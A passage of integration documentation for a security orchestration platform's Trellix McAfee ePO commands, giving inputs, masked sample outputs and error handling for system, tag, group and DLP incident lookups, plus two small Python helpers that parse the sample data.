    "tagNotes": "\"[\\r\\n \\r\\n  \\\"\\\"\\r\\n \\r\\n ]\"",
    "results": "\"[]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

results

{
    "EPOComputerProperties.ParentID": ***,
    "EPOComputerProperties.ComputerName": "***-DC",
    "EPOComputerProperties.Description": null,
    "EPOComputerProperties.ComputerDescription": "N/A",
    "EPOComputerProperties.TimeZone": "Pacific Standard Time",
    "EPOComputerProperties.DefaultLangID": "*****",
    "EPOComputerProperties.UserName": "administrator",
    "EPOComputerProperties.DomainName": "*****",
    "EPOComputerProperties.IPHostName": "*****-DC.*****.local",
    "EPOComputerProperties.IPV6": "0:0:0:0:0:FFFF:C0A0:000",
    "EPOComputerProperties.IPAddress": "1.1.1.1",
    "EPOComputerProperties.IPSubnet": "0:0:0:0:0:FFFF:C0A0:000",
    "EPOComputerProperties.IPSubnetMask": "0:0:0:0:0:FFFF:FFFF:FF00",
    "EPOComputerProperties.IPV4x": *****,
    "EPOComputerProperties.IPXAddress": "N/A",
    "EPOComputerProperties.SubnetAddress": "1.1.1.1",
    "EPOComputerProperties.SubnetMask": "2.2.2.2",
    "EPOComputerProperties.NetAddress": "*****",
    "EPOComputerProperties.OSType": "Windows Server 2019",
    "EPOComputerProperties.OSVersion": "10.0",
    "EPOComputerProperties.OSCsdVersion": "",
    "EPOComputerProperties.OSBuildNum": *****,
    "EPOComputerProperties.OSPlatform": "Server",
    "EPOComputerProperties.OSOEMID": "*****-*****-*****-*****",
    "EPOComputerProperties.CPUType": "Intel(R) Core(TM) i7-2600 CPU @ 3.40GHz",
    "EPOComputerProperties.CPUSpeed": 3392,
    "EPOComputerProperties.NumOfCPU": 8,
    "EPOComputerProperties.CPUSerialNumber": "N/A",
    "EPOComputerProperties.TotalPhysicalMemory": 17159188480,
    "EPOComputerProperties.FreeMemory": 8900734976,
    "EPOComputerProperties.FreeDiskSpace": 2005585,
    "EPOComputerProperties.TotalDiskSpace": 2059762,
    "EPOComputerProperties.IsPortable": 0,
    "EPOComputerProperties.Vdi": 0,
    "EPOComputerProperties.OSBitMode": 1,
    "EPOComputerProperties.LastAgentHandler": 1,
    "EPOComputerProperties.UserProperty1": "",
    "EPOComputerProperties.UserProperty2": "",
    "EPOComputerProperties.UserProperty3": "",
    "EPOComputerProperties.UserProperty4": "",
    "EPOComputerProperties.UserProperty5": "",
    "EPOComputerProperties.UserProperty6": "",
    "EPOComputerProperties.UserProperty7": "",
    "EPOComputerProperties.UserProperty8": "",
    "EPOComputerProperties.Free_Space_of_Drive_C": 1853153,
    "EPOComputerProperties.Total_Space_of_Drive_C": 1907177,
    "EPOLeafNode.Tags": "*****-dc, DC, DLP Deploy on *****-DC, Firewall For DC, Server",
    "EPOLeafNode.ExcludedTags": "",
    "EPOLeafNode.LastUpdate": "2020-03-16T08:12:02-07:00",
    "EPOLeafNode.ManagedState": 1,
    "EPOLeafNode.AgentGUID": "*****-*****-*****-*****-*****",
    "EPOLeafNode.AgentVersion": "5.6.1.157",
    "EPOBranchNode.AutoID": 7,
    "raw": "{'EPOComputerProperties.ParentID': *****, 'EPOComputerProperties.ComputerName': '*****-DC', 'EPOComputerProperties.Description': None, 'EPOComputerProperties.ComputerDescription': 'N/A', 'EPOComputerProperties.TimeZone': 'Pacific Standard Time'}",
    "status": "success",
    "system": "*****-DC"
}

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
|---|---|---|
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Find System failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 401. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unauthorized. |

Error Sample Data

Find System failed.

Status Code: 401.

Message: Unauthorized.

Find System By Tag Name

Retrieves system information based on the provided tag name.

Reader Note

Tag Name is a required parameter to run this command.

  • Run the Find Tag command to obtain Tag Name. Tag Names can be found in the returned raw data at the path $[*].tagName.

Input

| Input Parameter | Required/Optional | Description | Example |
|---|---|---|---|
| Tag Name | Required | The name of the tag to retrieve system information. Tag Name can be obtained using the Find Tag command. | ***-DC |

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "*****-DC": {
            "results": [
                {
                    "UDLP_EPOTagsView.NodeName": "*****-DC",
                    "UDLP_EPOTagsView.TagName": "*****-dc"
                }
            ]
        }
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "*****-DC": {
            "results": [
                {
                    "UDLP_EPOTagsView.NodeName": "*****-DC",
                    "UDLP_EPOTagsView.TagName": "*****-dc"
                }
            ]
        }
    }
]
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

***-DC

{
    "results": [
        {
            "UDLP_EPOTagsView.NodeName": "*****-DC",
            "UDLP_EPOTagsView.TagName": "*****-dc"
        }
    ]
}

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
|---|---|---|
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Find System By Tag Name failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 401. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unauthorized. |

Error Sample Data

Find System By Tag Name failed.

Status Code: 401.

Message: Unauthorized.

Find System In Group

Retrieves system information within the specified ePO group.

Reader Note

Group ID is a required parameter to run this command.

  • Run the Find Group or Find Groups command to obtain Group ID. Group IDs can be found in the returned raw data at the path $[*].groupId.

  • If the provided group ID cannot be found, this command will return success with no results.

Input

| Input Parameter | Required/Optional | Description | Example |
|---|---|---|---|
| Group ID | Required | The ID of the group to retrieve system information. Group IDs can be obtained using the Find Group or Find Groups commands. | 2 |
| Search Subgroups? | Optional | The option to include results within subgroups. | True |

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
{
		"EPOComputerProperties.ParentID": 1,
		"EPOComputerProperties.ComputerName": "*****-AD",
		"EPOComputerProperties.Description": null,
		"EPOComputerProperties.ComputerDescription": null,
		"EPOComputerProperties.TimeZone": "",
		"EPOComputerProperties.DefaultLangID": "",
		"EPOComputerProperties.UserName": "",
		"EPOComputerProperties.DomainName": "",
		"EPOComputerProperties.IPHostName": "",
		"EPOComputerProperties.IPV6": null,
		"EPOComputerProperties.IPAddress": "",
		"EPOComputerProperties.IPSubnet": null,
		"EPOComputerProperties.IPSubnetMask": null,
		"EPOComputerProperties.IPV4x": null,
		"EPOComputerProperties.IPXAddress": "",
		"EPOComputerProperties.SubnetAddress": "",
		"EPOComputerProperties.SubnetMask": "",
		"EPOComputerProperties.NetAddress": "",
		"EPOComputerProperties.OSType": "",
		"EPOComputerProperties.OSVersion": "",
		"EPOComputerProperties.OSCsdVersion": "",
		"EPOComputerProperties.OSBuildNum": 0,
		"EPOComputerProperties.OSPlatform": "",
		"EPOComputerProperties.OSOEMID": "",
		"EPOComputerProperties.CPUType": "",
		"EPOComputerProperties.CPUSpeed": 0,
		"EPOComputerProperties.NumOfCPU": 0,
		"EPOComputerProperties.CPUSerialNumber": "",
		"EPOComputerProperties.TotalPhysicalMemory": 0,
		"EPOComputerProperties.FreeMemory": 0,
		"EPOComputerProperties.FreeDiskSpace": 0,
		"EPOComputerProperties.TotalDiskSpace": 0,
		"EPOComputerProperties.IsPortable": -1,
		"EPOComputerProperties.Vdi": -1,
		"EPOComputerProperties.OSBitMode": -1,
		"EPOComputerProperties.LastAgentHandler": null,
		"EPOComputerProperties.UserProperty1": null,
		"EPOComputerProperties.UserProperty2": null,
		"EPOComputerProperties.UserProperty3": null,
		"EPOComputerProperties.UserProperty4": null,
		"EPOComputerProperties.UserProperty5": null,
		"EPOComputerProperties.UserProperty6": null,
		"EPOComputerProperties.UserProperty7": null,
		"EPOComputerProperties.UserProperty8": null,
		"EPOComputerProperties.Free_Space_of_Drive_C": 0,
		"EPOComputerProperties.Total_Space_of_Drive_C": 0,
		"EPOLeafNode.Tags": "",
		"EPOLeafNode.ExcludedTags": "",
		"EPOLeafNode.LastUpdate": null,
		"EPOLeafNode.ManagedState": 0,
		"EPOLeafNode.AgentGUID": null,
		"EPOLeafNode.AgentVersion": null,
		"EPOBranchNode.AutoID": 2
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

| EPOCOMPUTERPROPERTIES.PARENTID | EPOCOMPUTERPROPERTIES.COMPUTERNAME | EPOCOMPUTERPROPERTIES.DESCRIPTION | EPOCOMPUTERPROPERTIES.COMPUTERDESCRIPTION | EPOCOMPUTERPROPERTIES.TIMEZONE | EPOCOMPUTERPROPERTIES.DEFAULTLANGID | EPOCOMPUTERPROPERTIES.USERNAME | EPOCOMPUTERPROPERTIES.DOMAINNAME | EPOCOMPUTERPROPERTIES.IPHOSTNAME | EPOCOMPUTERPROPERTIES.IPV6 | EPOCOMPUTERPROPERTIES.IPADDRESS | EPOCOMPUTERPROPERTIES.IPSUBNET | EPOCOMPUTERPROPERTIES.IPSUBNETMASK | EPOCOMPUTERPROPERTIES.IPV4X | EPOCOMPUTERPROPERTIES.IPXADDRESS | EPOCOMPUTERPROPERTIES.SUBNETADDRESS | EPOCOMPUTERPROPERTIES.SUBNETMASK | EPOCOMPUTERPROPERTIES.NETADDRESS | EPOCOMPUTERPROPERTIES.OSTYPE | EPOCOMPUTERPROPERTIES.OSVERSION | EPOCOMPUTERPROPERTIES.OSCSDVERSION | EPOCOMPUTERPROPERTIES.OSBUILDNUM | EPOCOMPUTERPROPERTIES.OSPLATFORM | EPOCOMPUTERPROPERTIES.OSOEMID | EPOCOMPUTERPROPERTIES.CPUTYPE | EPOCOMPUTERPROPERTIES.CPUSPEED | EPOCOMPUTERPROPERTIES.NUMOFCPU | EPOCOMPUTERPROPERTIES.CPUSERIALNUMBER | EPOCOMPUTERPROPERTIES.TOTALPHYSICALMEMORY | EPOCOMPUTERPROPERTIES.FREEMEMORY | EPOCOMPUTERPROPERTIES.FREEDISKSPACE | EPOCOMPUTERPROPERTIES.TOTALDISKSPACE | EPOCOMPUTERPROPERTIES.ISPORTABLE | EPOCOMPUTERPROPERTIES.VDI | EPOCOMPUTERPROPERTIES.OSBITMODE | EPOCOMPUTERPROPERTIES.LASTAGENTHANDLER | EPOCOMPUTERPROPERTIES.USERPROPERTY1 | EPOCOMPUTERPROPERTIES.USERPROPERTY2 | EPOCOMPUTERPROPERTIES.USERPROPERTY3 | EPOCOMPUTERPROPERTIES.USERPROPERTY4 | EPOCOMPUTERPROPERTIES.USERPROPERTY5 | EPOCOMPUTERPROPERTIES.USERPROPERTY6 | EPOCOMPUTERPROPERTIES.USERPROPERTY7 | EPOCOMPUTERPROPERTIES.USERPROPERTY8 | EPOCOMPUTERPROPERTIES.FREE_SPACE_OF_DRIVE_C | EPOCOMPUTERPROPERTIES.TOTAL_SPACE_OF_DRIVE_C | EPOLEAFNODE.TAGS | EPOLEAFNODE.EXCLUDEDTAGS | EPOLEAFNODE.LASTUPDATE | EPOLEAFNODE.MANAGEDSTATE | EPOLEAFNODE.AGENTGUID | EPOLEAFNODE.AGENTVERSION | EPOBRANCHNODE.AUTOID |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1 | ***-AD | | | | | | | | | | | | | | | | | | | | 0 | | | | 0 | 0 | | 0 | 0 | 0 | 0 | -1 | -1 | -1 | | | | | | | | | | 0 | 0 | | | | 0 | | | 2 |

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
|---|---|---|
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Find System In Group failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 401. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unauthorized. |

Error Sample Data

Find System In Group failed.

Status Code: 401.

Message: Unauthorized.

Find Systems By Group IDs

Retrieves system information based on the provided group IDs.

Reader Note

Group ID is a required parameter to run this command.

  • Run the Find Group or Find Groups commands to obtain Group ID. Group IDs can be found in the returned raw data at the path $[*].groupId.

Input

| Input Parameter | Required/Optional | Description | Example |
|---|---|---|---|
| Group IDs | Optional | The IDs of the groups to retrieve system information. Group IDs can be obtained using the Find Group or Find Groups commands. | ["5"] |

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "EPOComputerProperties.ParentID": 2,
        "EPOComputerProperties.ComputerName": "*****",
        "EPOComputerProperties.Description": null,
        "EPOComputerProperties.ComputerDescription": "N/A",
        "EPOComputerProperties.TimeZone": "Pacific Standard Time",
        "EPOComputerProperties.DefaultLangID": "*****",
        "EPOComputerProperties.UserName": "Administrator",
        "EPOComputerProperties.DomainName": "WORKGROUP",
        "EPOComputerProperties.IPHostName": "*****",
        "EPOComputerProperties.IPV6": "0:0:0:0:0:FFFF:C0A0:0EB",
        "EPOComputerProperties.IPAddress": "1.2.3.4",
        "EPOComputerProperties.IPSubnet": "0:0:0:0:0:FFFF:C0A0:000",
        "EPOComputerProperties.IPSubnetMask": "0:0:0:0:0:FFFF:FFFF:FF00",
        "EPOComputerProperties.IPV4x": *****,
        "EPOComputerProperties.IPXAddress": "N/A",
        "EPOComputerProperties.SubnetAddress": "1.1.1.1",
        "EPOComputerProperties.SubnetMask": "2.2.2.2",
        "EPOComputerProperties.NetAddress": "*****",
        "EPOComputerProperties.OSType": "Windows Server 2016",
        "EPOComputerProperties.OSVersion": "10.0",
        "EPOComputerProperties.OSCsdVersion": "",
        "EPOComputerProperties.OSBuildNum": *****,
        "EPOComputerProperties.OSPlatform": "Server",
        "EPOComputerProperties.OSOEMID": "*****-*****-*****-*****",
        "EPOComputerProperties.CPUType": "Intel(R) Core(TM) i7-8700 CPU @ 3.20GHz",
        "EPOComputerProperties.CPUSpeed": 3192,
        "EPOComputerProperties.NumOfCPU": 12,
        "EPOComputerProperties.CPUSerialNumber": "N/A",
        "EPOComputerProperties.TotalPhysicalMemory": 17036529664,
        "EPOComputerProperties.FreeMemory": 3377205248,
        "EPOComputerProperties.FreeDiskSpace": 2030176,
        "EPOComputerProperties.TotalDiskSpace": 2981159,
        "EPOComputerProperties.IsPortable": 0,
        "EPOComputerProperties.Vdi": 0,
        "EPOComputerProperties.OSBitMode": 1,
        "EPOComputerProperties.LastAgentHandler": 1,
        "EPOComputerProperties.UserProperty1": "",
        "EPOComputerProperties.UserProperty2": "",
        "EPOComputerProperties.UserProperty3": "",
        "EPOComputerProperties.UserProperty4": "",
        "EPOComputerProperties.UserProperty5": "",
        "EPOComputerProperties.UserProperty6": "",
        "EPOComputerProperties.UserProperty7": "",
        "EPOComputerProperties.UserProperty8": "",
        "EPOComputerProperties.Free_Space_of_Drive_C": 476782,
        "EPOComputerProperties.Total_Space_of_Drive_C": 952335,
        "EPOLeafNode.Tags": "AR Retry, DLP_Yabin_test, Server, TestTag, Workstation, Yabin AR",
        "EPOLeafNode.ExcludedTags": "",
        "EPOLeafNode.LastUpdate": "2020-02-10T14:15:53-08:00",
        "EPOLeafNode.ManagedState": 1,
        "EPOLeafNode.AgentGUID": "*****-*****-*****-*****-*****",
        "EPOLeafNode.AgentVersion": "5.5.0.447",
        "EPOBranchNode.AutoID": 5
    }
]
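The Raw Data samples for Find System In Group and Find Systems By Group IDs differ mainly in `EPOLeafNode.ManagedState`, `EPOLeafNode.AgentGUID` and `EPOLeafNode.LastUpdate`, which is what an agent-coverage check keys on. The following is an added example, not D3 or Trellix code: the function names, the 7-day threshold, the reading of `ManagedState == 1` as "managed", and the constructed sample records are all assumptions.

```python
import json
from datetime import datetime, timedelta, timezone

# Constructed sample in the shape of the Raw Data samples above.
# Host names, IP address and GUID are placeholders, not values from the page.
SAMPLE_RAW = """
[
  {"EPOComputerProperties.ComputerName": "HOST-A",
   "EPOComputerProperties.IPAddress": "1.2.3.4",
   "EPOLeafNode.LastUpdate": "2020-02-10T14:15:53-08:00",
   "EPOLeafNode.ManagedState": 1,
   "EPOLeafNode.AgentGUID": "00000000-0000-0000-0000-000000000001",
   "EPOLeafNode.AgentVersion": "5.5.0.447",
   "EPOBranchNode.AutoID": 5},
  {"EPOComputerProperties.ComputerName": "HOST-B",
   "EPOComputerProperties.IPAddress": "",
   "EPOLeafNode.LastUpdate": null,
   "EPOLeafNode.ManagedState": 0,
   "EPOLeafNode.AgentGUID": null,
   "EPOLeafNode.AgentVersion": null,
   "EPOBranchNode.AutoID": 2}
]
"""


def normalize_records(raw):
    """Return a list of system records from the shapes shown on this page:
    a JSON array, a single object, or an object wrapping a "results" array."""
    if isinstance(raw, str):
        raw = json.loads(raw)
    if isinstance(raw, dict):
        raw = raw["results"] if isinstance(raw.get("results"), list) else [raw]
    return [r for r in raw if isinstance(r, dict)]


def classify(record, now, max_age=timedelta(days=7)):
    """Classify one record as 'unmanaged', 'stale' or 'ok'.

    Assumptions: ManagedState == 1 means an agent is installed and reporting;
    the 7-day staleness threshold is an example value.
    """
    managed = record.get("EPOLeafNode.ManagedState") == 1
    if not managed or not record.get("EPOLeafNode.AgentGUID"):
        return "unmanaged"
    last_update = record.get("EPOLeafNode.LastUpdate")
    if not last_update:
        return "stale"  # managed, but has never reported
    seen = datetime.fromisoformat(last_update)  # e.g. 2020-02-10T14:15:53-08:00
    if seen.tzinfo is None:
        seen = seen.replace(tzinfo=timezone.utc)  # assumption: naive means UTC
    return "stale" if now - seen > max_age else "ok"


def triage(raw, now=None):
    """Group computer names by coverage status. An empty result set (for
    example an unknown group ID, which returns success with no results)
    yields empty buckets rather than an error."""
    now = now or datetime.now(timezone.utc)
    buckets = {"ok": [], "stale": [], "unmanaged": []}
    for record in normalize_records(raw):
        name = record.get("EPOComputerProperties.ComputerName") or "<unnamed>"
        buckets[classify(record, now)].append(name)
    return buckets


if __name__ == "__main__":
    fixed_now = datetime(2020, 2, 12, tzinfo=timezone.utc)
    for status, hosts in triage(SAMPLE_RAW, fixed_now).items():
        print(status, hosts)
```

Systems in the `unmanaged` bucket have no agent to enforce policy, so a playbook would normally route them to deployment or investigation before relying on any tag or policy command against them.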
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "GroupID": "5",
        "SystemName": "*****",
        "MACAddress": "*****"
    },
    {
        "GroupID": "5",
        "SystemName": "*****",
        "MACAddress": "*****"
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "GroupIDs": "\"[\\r\\n\\t\\t\\t\\\"5\\\",\\r\\n\\t\\t\\t\\\"5\\\"\\r\\n\\t\\t]\"",
    "SystemNames": "\"[\\r\\n\\t\\t\\t\\\"*****\\\",\\r\\n\\t\\t\\t\\\"*****\\\"\\r\\n\\t\\t]\"",
    "MACAddresses": "\"[\\r\\n\\t\\t\\t\\\"*****\\\",\\r\\n\\t\\t\\t\\\"*****\\\"\\r\\n\\t\\t]\""
}
Return Data

Indicates one of the possible command execution states: Successful, Partially Successful, or Failed.

The Partially Successful state only occurs when a command’s input accepts an array of items (e.g. an array of IP addresses) and one or more items within the array return an error from the API request.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

| GroupID | SystemName | MACAddress |
|---|---|---|
| 5 | *** | *** |
| 5 | *** | *** |

Error Handling

If the Return Data is Partially Successful or Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
|---|---|---|
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Find Systems By Group IDs failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 400. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Expecting value: line 1 column 1 (char 0). |

Error Sample Data

Find Systems By Group IDs failed.

Status Code: 400.

Message: Expecting value: line 1 column 1 (char 0).

Find Tag

Retrieves tag information based on the provided search text.

Input

| Input Parameter | Required/Optional | Description | Example |
|---|---|---|---|
| Search Text | Optional | The search text containing the keywords to retrieve tag information. If there are no matches with the search keywords, the command will indicate success with no results. | TestTag |

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "tagNotes": "",
        "tagId": 43,
        "tagName": "TestTag"
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "tagNotes": "",
        "tagId": 43,
        "tagName": "TestTag"
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "tagId": "\"[\\r\\n\\t\\t\\t43\\r\\n\\t\\t]\"",
    "tagName": "\"[\\r\\n\\t\\t\\t\\\"TestTag\\\"\\r\\n\\t\\t]\"",
    "tagNotes": "\"[\\r\\n\\t\\t\\t\\\"\\\"\\r\\n\\t\\t]\""
}
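In the Key Fields samples for Find Tag and Find Systems By Group IDs, each value is a JSON array that has been encoded into a string more than once, so a playbook input that needs the actual tag IDs or group IDs has to unwrap it first. The following is an added example, not D3's own code; `unwrap`, `decode_key_fields` and `unique` are hypothetical helper names.

```python
import json

# Key Fields sample for Find Tag, copied from this page as displayed.
FIND_TAG_KEY_FIELDS = r'''
{
    "tagId": "\"[\\r\\n\\t\\t\\t43\\r\\n\\t\\t]\"",
    "tagName": "\"[\\r\\n\\t\\t\\t\\\"TestTag\\\"\\r\\n\\t\\t]\"",
    "tagNotes": "\"[\\r\\n\\t\\t\\t\\\"\\\"\\r\\n\\t\\t]\""
}
'''


def unwrap(value, max_layers=4):
    """Decode a value that was JSON-encoded into a string one or more times.

    Decoding stops at the first non-string result, at a string that does not
    look like JSON, or after max_layers passes. Elements inside the decoded
    list are left untouched, so a tag name that happens to look like JSON is
    not reinterpreted.
    """
    for _ in range(max_layers):
        if not isinstance(value, str):
            return value
        text = value.strip()
        if not text or text[0] not in '[{"':
            return value  # ordinary string, nothing to unwrap
        try:
            value = json.loads(text)
        except json.JSONDecodeError:
            return value  # looked like JSON but is not; keep it verbatim
    return value


def decode_key_fields(text):
    """Parse a Key Fields object into {field name: list of native values}."""
    decoded = {}
    for name, value in json.loads(text).items():
        inner = unwrap(value)
        decoded[name] = inner if isinstance(inner, list) else [inner]
    return decoded


def unique(values):
    """Drop duplicates while keeping order (the GroupIDs sample repeats "5")."""
    seen, out = set(), []
    for item in values:
        key = json.dumps(item, sort_keys=True)
        if key not in seen:
            seen.add(key)
            out.append(item)
    return out


if __name__ == "__main__":
    for field, items in decode_key_fields(FIND_TAG_KEY_FIELDS).items():
        print(field, items)
```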
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

| tagNotes | tagId | tagName |
|---|---|---|
| | 43 | TestTag |

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
|---|---|---|
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Find Tag failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 401. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unauthorized. |

Error Sample Data

Find Tag failed.

Status Code: 401.

Message: Unauthorized.

Get Device Info

Retrieves system information on the specified hosts.

Input

| Input Parameter | Required/Optional | Description | Example |
|---|---|---|---|
| IPs or Hostnames | Optional | The IP addresses or hostnames to retrieve system information. | ["1.1.1.1"] |

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
No Sample Data
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
No Sample Data
Return Data

Indicates one of the possible command execution states: Successful, Partially Successful, or Failed.

The Partially Successful state only occurs when a command’s input accepts an array of items (e.g. an array of IP addresses) and one or more items within the array return an error from the API request.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

CODE
No Sample Data

Error Handling

If the Return Data is Partially Successful or Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
|---|---|---|
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Get Device Info failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 401. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unauthorized. |

Error Sample Data

Get Device Info failed.

Status Code: 401.

Message: Unauthorized.

Get DLP Incident

Retrieves DLP incidents.

Input

| Input Parameter | Required/Optional | Description | Example |
|---|---|---|---|
| Start Time | Optional | The start time of the time range to retrieve DLP incidents, in UTC time. | 2021-01-11 00:00 |
| End Time | Optional | The end time of the time range to retrieve DLP incidents, in UTC time. | 2021-05-11 00:00 |

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "UDLP_Incidents.IncidentId": *****,
        "UDLP_EventUsers.UserName": "Administrator",
        "UDLP_Incidents.ComputerID": 2,
        "UDLP_EventComputers.Name": "*****-PC5",
        "UDLP_EventComputers.IP": "1.1.1.1",
        "UDLP_Incidents.IncidentType": 10000,
        "UDLP_Incidents.ViolationLocalTime": "2021-05-05T14:01:39-07:00",
        "UDLP_Incidents.ViolationTimezone": "Pacific Daylight Time",
        "UDLP_IncidentStatuses.StatusKey": "NEW",
        "UDLP_Incidents.TotalMatchCount": 0,
        "UDLP_Incidents.TotalContentSize": 0,
